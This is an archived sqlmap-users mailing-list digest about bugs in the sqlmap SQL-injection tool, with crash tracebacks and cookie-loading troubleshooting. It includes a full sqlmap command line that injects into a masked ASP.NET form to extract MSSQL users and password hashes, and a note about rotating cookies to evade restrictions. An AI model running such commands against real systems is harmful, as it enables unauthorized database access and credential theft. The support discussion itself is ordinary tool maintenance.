Thread: Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
From: B. <sto...@qq...> - 2013-05-30 14:57:45
Hi friend,

Could you help me with this bug?

[22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u *********************************************** --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords
Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 87, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
  File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes
    if user in retrievedUsers:
TypeError: unhashable type: 'list'

[*] shutting down at 22:54:12

Thanks
BOB

------------------ Original ------------------
From: "sqlmap-users-request"<sql...@li...>;
Date: May 29, 2013
To: "sqlmap-users"<sql...@li...>;
Subject: sqlmap-users Digest, Vol 31, Issue 1

Send sqlmap-users mailing list submissions to
    sql...@li...

To subscribe or unsubscribe via the World Wide Web, visit
    https://lists.sourceforge.net/lists/listinfo/sqlmap-users
or, via email, send a message with subject or body 'help' to
    sql...@li...

You can reach the person managing the list at
    sql...@li...

When replying, please edit your Subject line so it is more specific
than "Re: Contents of sqlmap-users digest..."

Today's Topics:

   1. Re: Feature request (David Guimaraes)
   2. Re: --load-cookies (Dirk Wetter)
   3. Re: --load-cookies (Miroslav Stampar)
   4. Re: Patch for /task/<task_id>/delete in clean_filesystem (Miroslav Stampar)
   5. Re: --load-cookies (Dirk Wetter)
   6. --host parameter (co...@5i...)
   7. Sqlmap and direct connect error (???????? ??????)
   8. Re: --host parameter (Miroslav Stampar)
   9. Re: Sqlmap and direct connect error (Miroslav Stampar)
  10. feature request: offline mode for --dns-domain? (buawig)
  11. feature request: --dns-domain for non-root users (--dns-port) (buawig)
  12. Domain credentials (Brian Milliron)
  13. Re: Domain credentials (Brandon Perry)
  14. Re: feature request: offline mode for --dns-domain? (Miroslav Stampar)
  15. Re: Domain credentials (Miroslav Stampar)
  16. Re: feature request: fetch DNS queries from DNS server via HTTP (buawig)
  17. Re: feature request: fetch DNS queries from DNS server via HTTP (Miroslav Stampar)
  18. MySQL error based technique bug (Konrads Smelkovs)
  19. Re: MySQL error based technique bug (Miroslav Stampar)
  20. SQLmap crashing (Phillip Wylie)
  21. Re: SQLmap crashing (Miroslav Stampar)
  22. Custom injection payload in POST (Marcell Fodor)
  23. Re: SQLmap crashing (Miroslav Stampar)
  24. I got error on windows (warezhacking)
  25. Appending to a dump (Stephen Shkardoon)
  26. Re: Appending to a dump (Miroslav Stampar)
  27. Re: Appending to a dump (Stephen Shkardoon)
  28. Re: Appending to a dump (Miroslav Stampar)
  29. --ignore-404 ? (buawig)
  30. PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (buawig)
  31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar)
  32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar)
  33. Re: --ignore-404 ? (Miroslav Stampar)
  34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
  35. Re: BUG...!!!! o.O (Miroslav Stampar)
  36. gun...@gm... wants to follow you. Accept? (gun...@gm...)
  37. Direct access to mysql database (Marcell Fodor)
  38. Re: Direct access to mysql database (Miroslav Stampar)
  39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... (Badoo)
  40. Not getting any sensitive data from database (Marcell Fodor)
  41. Re: Not getting any sensitive data from database (Miroslav Stampar)
  42. unhandled exception (kvasilopoulos)
  43. [SQLMAP] Unhandled exception for IPv6 (e.n...@st...)
  44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  45. Re: unhandled exception (Miroslav Stampar)
  46. Passing SOAPAction in --header (Brandon Perry)
  47. Re: Passing SOAPAction in --header (Miroslav Stampar)
  48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  49. Blind SQL Injection question (Guy Dufour)
  50. Re: Blind SQL Injection question (Chris Oakley)
  51. Re: Passing SOAPAction in --header (Brandon Perry)
  52. Re: Passing SOAPAction in --header (Brandon Perry)
  53. Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar)
  54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry)
  55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar)
  56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry)
  57. SQLMAP Bug (Joe O'Hara)
  58. Re: SQLMAP Bug (Miroslav Stampar)
  59. [CRITICAL] (Thai Thao)
  60. Re: [CRITICAL] (Miroslav Stampar)
  61. Providing multiple dbms (Sebastian Nerz)
  62. Re: Providing multiple dbms (Miroslav Stampar)

----------------------------------------------------------------------

Message: 1
Date: Sat, 13 Apr 2013 21:40:39 -0300
From: David Guimaraes <sk...@gm...>
Subject: Re: [sqlmap-users] Feature request
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <CAJ...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Good question Miroslav..

I tried to think in something that can be implemented without ruin sqlmap query schema, but I could not come to any conclusion... =(

The thing is, sqlsus use a different approach to dump the data, making this kind of thing possible...

The solution that I found in this particular scenario is to use sqlsus, unfortunately...

Regards.

David

On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi David.
>
> And what do you recommend to be done in case of query with length > max_inj_length?
>
> Kind regards,
> Miroslav Stampar
> On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>
>> Hi, I am trying to perform sql injection on a web site but I can not get
>> successful due to a size limitation on the query sent to the server. The
>> server is limiting the size of query in 512 bytes only and sqlmap do not
>> have any customization that allows me to bypass this restriction like
>> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf"
>> that measure the permitted query size.
>>
>> There is some chance to put this kind of feature in sqlmap?
>>
>> Thanks.
>>
>> --
>> David Gomes Guimarães
>>
>>
>> ------------------------------------------------------------------------------
>> Own the Future-Intel Level Up Game Demo Contest 2013
>> Rise to greatness in Intel's independent game demo contest.
>> Compete for recognition, cash, and the chance to get your game
>> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> Submit your demo by 6/6/13.
>> http://p.sf.net/sfu/intel_levelupd2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>

--
David Gomes Guimarães
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 2
Date: Mon, 15 Apr 2013 11:36:37 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1

On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?

thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:

/usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
Traceback (most recent call last):
  File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
    assert domain_specified == initial_dot
AssertionError

  _warn_unhandled_exception()
[11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')

the 999.. looks strange to me.

>
>
> On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi Dirk.
>
> Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>

that's true but IMO 0 represents just a session cookie. Example:

prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
# HTTP cookie file.
# Generated by Wget on 2013-04-15 11:23:13.
# Edit at your own risk.

.bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
.bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
.bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
.bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
.bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
.bing.com TRUE / FALSE 0 _HOP
.bing.com TRUE / FALSE 0 _FS NU=1
.bing.com TRUE / FALSE 1429089794 _FP EM=1
www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314

prompt%

Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.

Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last cookie only for the first 120 tries.

Cheers, Dirk

>
> Kind regards,
> Miroslav Stampar
>
>
> On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>
>
> Hi Miroslav,
>
> thx for your prompt answer.
>
> On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Could you please get the latest revision and retry it again?
> ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> The slight difference seems to be that in the case where I didn't supply a cookie
> sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> >
> > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> >
> > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>
> sure, here you go:
>
> --snip
> # Netscape HTTP Cookie File
> <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> [..]
> --snap
>
> They are all session cookies.
> For easier reading here I put some blanks in the line
> above, in "cookie-file" there aren't any though. Cookies were generated with
> stompy and a shell script (looks the same as with
> wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>
> Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>
> >
> > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>
> see above.
>
> Cheers,
>
> Dirk
>
> >
> >
> > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> > Hi Miroslav,
> >
> > yes unfortunately.
> >
> > If I omit the cookie line in the request header completely, sqlmap
> > seems to take the first cookie issued by the server with set-cookie (and
> > puts it silently in).
> >
> > Cheers,
> >
> > Dirk
> >
> >
> >
> > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > Hi.
> > >
> > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > >
> > > Kind regards,
> > > Miroslav Stampar
> > >
> > >
> > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > >
> > > Hi folks,
> > >
> > > .... that doesn't work for me.
> > > It always uses the cookie supplied
> > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > from the 1st server reply is being used)
> > >
> > > So what is wrong in here:
> > >
> > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > --level=2 --risk=2 -r $REQUEST
> > >
> > > The content of the file $REQUEST is:
> > >
> > > POST <URL> HTTP/1.1
> > > Host: <HOST>
> > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > Accept-Language: en-US,en;q=0.5
> > > Accept-Encoding: gzip, deflate
> > > Referer: <Referer>
> > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > Connection: keep-alive
> > > Content-Type: application/x-www-form-urlencoded
> > > Content-Length: 67
> > >
> > > <abunchofpostparams>
> > >
> > >
> > > No hints that cookie-file is not in correct format (I've been through this,
> > > at least I think so ;) ).
> > >
> > > Any insight would be much appreciated.
> > >
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > > ------------------------------------------------------------------------------
> > > Precog is a next-generation analytics platform capable of advanced
> > > analytics on semi-structured data. The platform includes APIs for building
> > > apps and a phenomenal toolset for data science. Developers can use
> > > our toolset for easy data analysis & visualization. Get a free account!
> > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > _______________________________________________
> > > sqlmap-users mailing list
> > > sql...@li...
> > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> > >
> > >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

------------------------------

Message: 3
Date: Mon, 15 Apr 2013 11:45:19 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --load-cookies
To: Dirk Wetter <sp...@dr...>
Cc: SqlMap List <sql...@li...>
Message-ID: <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Dirk.

Now that crash should be "patched".

Could you please retry it now and say if the latest revision suits your needs?

Kind regards,
Miroslav Stampar

On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:

>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that value 0?
> > That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com TRUE / FALSE 0 _HOP
> .bing.com TRUE / FALSE 0 _FS NU=1
> .bing.com TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last cookie only for the first 120 tries.
>
> Cheers, Dirk
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> > >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks the same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> > >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > puts it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > > >
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > > ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform capable of advanced
> > > > analytics on semi-structured data.
> > > > The platform includes APIs for building
> > > > apps and a phenomenal toolset for data science. Developers can use
> > > > our toolset for easy data analysis & visualization. Get a free account!
> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > _______________________________________________
> > > > sqlmap-users mailing list
> > > > sql...@li...
> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > > >
> > > >
> > > >
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
> > > >
> > > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> > >
> > >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>

--
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Mon, 15 Apr 2013 11:46:21 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in clean_filesystem
To: Brandon Perry <bpe...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID: <CA+9yoX3RNQDm=PqT...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Brandon.

Thank you for your patch and find it now included [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224

On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...> wrote:

> Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> call when self.output_directory is NoneType and clean_system() is called.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

--
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 5
Date: Mon, 15 Apr 2013 12:19:13 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1

Hi Miroslav,

On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?

cool, thx. Works!

However (sorry): One needs to omit the cookie in the request header, otherwise it just uses the one supplied by the request.
Then: It doesn't change the cookie. Maybe I was interpreting that not correctly but my point was using the load-cookies option to direct sqlmap to change cookies once in a while (whenever that's gonna be). This is to circumvent restrictions one can encounter otherwise....

Cheers, Dirk

>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized" now.
> > Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com TRUE / FALSE 0 _HOP
> .bing.com TRUE / FALSE 0 _FS NU=1
> .bing.com TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last cookie only for the first 120 tries.
>
> Cheers, Dirk
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> > >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks the same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> > >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > puts it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > > >
> > > >
